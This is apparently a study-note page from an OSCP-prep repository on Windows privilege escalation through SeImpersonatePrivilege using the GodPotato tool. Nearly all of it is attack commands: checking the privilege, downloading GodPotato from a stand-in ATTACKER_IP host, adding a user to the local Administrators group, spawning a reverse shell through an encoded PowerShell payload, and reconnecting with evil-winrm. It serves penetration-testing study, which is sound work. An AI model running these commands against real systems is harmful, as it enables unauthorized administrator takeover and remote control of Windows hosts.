// notes/ PrivEsc — Windows
🥔
SeImpersonatePrivilege
Why SeImpersonatePrivilege matters and how the Potato family abuses it.
#seimpersonate#potato#windows
source · airouboss/oscp-prep-notes-2026 · concepts/seimpersonate-privilege.md ↗SeImpersonatePrivilege Exploitation
Check for Privilege
powershell
$whoami /priv$# Look for: SeImpersonatePrivilege EnabledGodPotato Exploitation
powershell
$# Download GodPotato$iwr -uri http://ATTACKER_IP/GodPotato.exe -o GodPotato.exe$ $# Add user to Administrators$.\GodPotato.exe -cmd "cmd /c net localgroup Administrators username /add"$ $# Direct reverse shell$.\GodPotato.exe -cmd "cmd /c powershell -e <base64_payload>"After Exploitation
powershell
$# Reconnect with elevated privileges$evil-winrm -u "username" -p "password" -i $IP$ $# Verify admin access$whoami /groups | findstr AdminWorks with: Service accounts, IIS worker processes, SQL Server